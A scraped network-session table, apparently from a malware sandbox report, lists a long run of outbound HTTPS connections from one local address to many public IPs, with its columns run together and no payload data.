                                                21719192.168.2.1336114186.202.103.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21720192.168.2.1358806138.47.69.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21721192.168.2.135287851.14.100.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21722192.168.2.1345928143.175.56.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21723192.168.2.1347822186.199.85.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21724192.168.2.1353368208.175.138.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21725192.168.2.133922289.166.69.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21726192.168.2.135152018.56.53.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21727192.168.2.133795485.29.216.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21728192.168.2.135915437.150.231.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21729192.168.2.135798842.196.179.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21730192.168.2.1334892188.41.3.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21731192.168.2.134915824.28.212.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21732192.168.2.13541742.214.220.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21733192.168.2.1357308168.173.214.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21734192.168.2.1346236163.1.75.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21735192.168.2.1351628168.8.26.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21736192.168.2.134002690.162.69.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21737192.168.2.1350594136.216.228.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21738192.168.2.1347796167.103.1.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21739192.168.2.134430886.213.4.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21740192.168.2.134014231.138.193.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21741192.168.2.1337578136.236.150.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21742192.168.2.1348180199.78.209.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21743192.168.2.134625483.52.128.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21744192.168.2.1348394144.116.125.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21745192.168.2.1354488204.80.11.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21746192.168.2.1349858195.233.49.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21747192.168.2.1341178199.188.190.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21748192.168.2.133493034.169.155.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21749192.168.2.1335304125.97.48.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21750192.168.2.1352490154.114.196.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21751192.168.2.135675038.138.107.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21752192.168.2.1345900149.34.94.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21753192.168.2.1336366201.45.102.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21754192.168.2.1332842197.67.27.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21755192.168.2.1347888208.130.169.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21756192.168.2.1339196175.70.226.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21757192.168.2.1337814132.188.231.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21758192.168.2.133947283.158.39.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21759192.168.2.134176493.23.206.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21760192.168.2.1354496212.46.192.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21761192.168.2.1356558154.235.2.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21762192.168.2.1333320128.179.243.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21763192.168.2.1346196211.62.26.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21764192.168.2.1344364161.113.107.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21765192.168.2.133799485.169.41.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21766192.168.2.134216023.123.157.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21767192.168.2.1344818153.238.144.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21768192.168.2.1340992216.221.243.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21769192.168.2.135734699.16.168.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21770192.168.2.1335038145.41.147.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21771192.168.2.133653093.0.211.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21772192.168.2.134277481.78.97.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21773192.168.2.1338942195.93.199.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21774192.168.2.133919870.24.27.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21775192.168.2.1341154219.213.92.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21776192.168.2.1360838191.65.158.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21777192.168.2.134529276.212.232.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21778192.168.2.13480689.224.68.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21779192.168.2.133325449.228.154.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21780192.168.2.135215495.60.190.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21781192.168.2.1353676198.72.123.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21782192.168.2.134215659.27.41.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21783192.168.2.1343460110.186.177.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21784192.168.2.134289469.185.123.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21785192.168.2.1353206204.100.77.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21786192.168.2.133925441.107.27.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21787192.168.2.134417098.175.205.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21788192.168.2.1349540160.27.185.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21789192.168.2.1333980111.3.41.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21790192.168.2.1344790104.215.47.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21791192.168.2.1359418152.9.18.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21792192.168.2.134842641.20.149.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21793192.168.2.135632027.193.216.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21794192.168.2.133950825.42.184.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21795192.168.2.1357084169.51.28.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21796192.168.2.1352572162.213.205.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21797192.168.2.1348412194.98.249.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21798192.168.2.1335706110.236.120.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21799192.168.2.1338404115.79.78.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21800192.168.2.134043024.127.134.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21801192.168.2.1350722105.43.53.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21802192.168.2.1358874178.88.217.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21803192.168.2.1337908217.86.185.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21804192.168.2.135725617.228.66.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21805192.168.2.1340544134.237.32.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21806192.168.2.1350042112.246.219.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21807192.168.2.1350464128.210.100.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21808192.168.2.1356972105.241.183.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21809192.168.2.135681823.191.19.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21810192.168.2.1354878131.9.13.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21811192.168.2.134963871.216.51.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21812192.168.2.1338766216.111.186.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21813192.168.2.134075664.2.119.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21814192.168.2.1345600189.145.126.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21815192.168.2.133817031.183.199.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21816192.168.2.133582067.88.122.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21817192.168.2.1333050157.181.145.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21818192.168.2.1337684203.98.206.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21819192.168.2.1359244159.132.60.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21820192.168.2.135872651.152.127.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21821192.168.2.1333820107.144.80.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21822192.168.2.1358178172.206.19.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21823192.168.2.1355946186.71.232.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21824192.168.2.1353140130.209.113.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21825192.168.2.1340174153.95.105.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21826192.168.2.1349584188.174.17.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21827192.168.2.1359442136.183.49.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21828192.168.2.1335602178.1.30.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21829192.168.2.1346566187.64.91.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21830192.168.2.1343152182.55.201.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21831192.168.2.135976012.129.69.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21832192.168.2.1359462168.155.89.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21833192.168.2.133582067.119.81.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21834192.168.2.135350027.239.166.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21835192.168.2.1350498219.178.130.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21836192.168.2.1352630189.3.28.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21837192.168.2.134197073.4.82.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21838192.168.2.1342516153.62.28.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21839192.168.2.1355686193.66.131.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21840192.168.2.134590894.127.206.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21841192.168.2.135423865.155.132.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21842192.168.2.1334060148.44.131.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21843192.168.2.1338474208.251.44.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21844192.168.2.1358272133.117.72.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21845192.168.2.1333492201.115.36.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21846192.168.2.135185276.195.70.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21847192.168.2.134298479.157.158.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21848192.168.2.133859074.137.51.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21849192.168.2.1360514110.80.193.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21850192.168.2.135636247.124.80.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21851192.168.2.1335350198.239.187.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21852192.168.2.134927297.195.159.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21853192.168.2.1337640205.238.185.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21854192.168.2.134817641.211.100.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21855192.168.2.1334120153.17.75.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21856192.168.2.1352004174.193.102.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21857192.168.2.1341100209.203.43.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21858192.168.2.134845471.121.146.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21859192.168.2.1333628210.69.122.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21860192.168.2.1351696205.17.237.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21861192.168.2.1354954194.56.60.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21862192.168.2.1338396128.17.41.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21863192.168.2.1354770123.138.221.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21864192.168.2.134689439.188.17.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21865192.168.2.1346376170.65.130.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21866192.168.2.133389488.67.155.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21867192.168.2.134083019.162.60.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21868192.168.2.1354118124.89.236.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21869192.168.2.1358350151.150.60.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21870192.168.2.1346090200.193.56.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21871192.168.2.1358462219.208.129.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21872192.168.2.135207879.48.214.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21873192.168.2.134006087.113.203.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21874192.168.2.1359986188.62.129.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21875192.168.2.133469685.162.183.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21876192.168.2.1341598136.49.246.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21877192.168.2.1350024122.128.151.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21878192.168.2.134681219.19.106.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21879192.168.2.1336302190.101.119.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21880192.168.2.1356238148.190.103.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21881192.168.2.136073864.131.191.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21882192.168.2.1355826184.113.126.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21883192.168.2.1354946156.230.126.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21884192.168.2.135458439.253.178.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21885192.168.2.1349888160.193.56.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21886192.168.2.1353326105.214.120.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21887192.168.2.134630861.85.24.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21888192.168.2.1351060176.236.45.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21889192.168.2.1358134138.235.100.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21890192.168.2.135774636.124.161.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21891192.168.2.1358784178.232.118.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21892192.168.2.133279695.5.101.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21893192.168.2.134556881.30.45.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21894192.168.2.1342892204.9.41.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21895192.168.2.1350584199.92.31.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21896192.168.2.135359057.84.21.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21897192.168.2.1354260152.114.168.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21898192.168.2.1354840142.194.46.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21899192.168.2.1351014140.173.225.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21900192.168.2.1335052161.101.211.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21901192.168.2.135372690.178.21.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21902192.168.2.134995271.17.252.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21903192.168.2.1354068161.233.51.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21904192.168.2.1358944216.57.135.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21905192.168.2.133356270.189.58.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21906192.168.2.1358200169.225.144.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21907192.168.2.1360832107.232.101.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21908192.168.2.1356160121.249.174.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21909192.168.2.135965253.93.246.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21910192.168.2.135677457.208.20.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21911192.168.2.1336220176.184.193.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21912192.168.2.1359758109.112.199.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21913192.168.2.135074695.137.61.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21914192.168.2.134982090.127.216.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21915192.168.2.135598013.152.44.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21916192.168.2.1360568161.139.247.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21917192.168.2.1360294205.71.255.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21918192.168.2.135357484.30.13.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21919192.168.2.13598984.230.41.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21920192.168.2.1335602146.206.154.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21921192.168.2.1348282172.195.146.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21922192.168.2.1335970194.79.31.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21923192.168.2.133844051.77.126.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21924192.168.2.1349094181.137.93.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21925192.168.2.1343812145.3.67.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21926192.168.2.133359032.136.95.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21927192.168.2.135672259.202.184.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21928192.168.2.1332936169.1.198.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21929192.168.2.134751686.104.69.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21930192.168.2.135370638.120.215.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21931192.168.2.134037075.111.6.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21932192.168.2.1355188115.154.33.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21933192.168.2.133409095.168.233.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21934192.168.2.1347726139.104.45.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21935192.168.2.1354330209.100.100.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21936192.168.2.1354326122.208.219.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21937192.168.2.1355666119.55.159.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21938192.168.2.1337070207.238.171.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21939192.168.2.135052477.252.28.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21940192.168.2.1340218161.51.88.159443
                                                TimestampBytes transferredDirectionData


